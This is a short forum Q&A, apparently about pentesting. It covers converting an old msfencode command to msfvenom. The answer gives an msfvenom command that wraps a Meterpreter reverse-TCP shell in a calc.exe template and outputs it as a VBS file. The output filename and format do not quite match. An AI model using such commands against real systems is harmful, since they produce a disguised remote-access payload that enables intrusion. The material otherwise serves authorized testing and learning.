# Practical example of pentesting using msfvenom

Tags: metasploit, msfvenom

I'm updating a small article that is out of date, but I don't know a lot about pentesting.

The framework is `mfsvenom` and the code is:

```
msfencode -x calc.exe -t loop-vbs -o final.vbs
```

Before it was used `msfencode` and `msfpayload` but now is out of date. I tried:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=localhost LPORT=number -f vbs ...
```

It's only because some user asked me about one article of pentesting if it was possible to do with `msfvenom`. But I don't know how to update it correctly.

Comment: have you looked up the many examples from Rapid7 or any of the other tutorials out there?

Comment: Put the reference of the article or what is the desired output.

Answer (score 1):

Meanwhile in `msfencode`:

`-x` told msfencode that you want to use `calc.exe` as template;

`-t` is the output format;

`-o` output file.

To convert it to `msfvenom` it does not change to much:

```
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=localhost LPORT=number -x calc.exe -f loop-vbs -o final.exe
```

Note that the only [flag] change in the `msfencode` perspective is from `-t` to  `-f`.

You can execute `msfvenom --list formats` to know the available output format .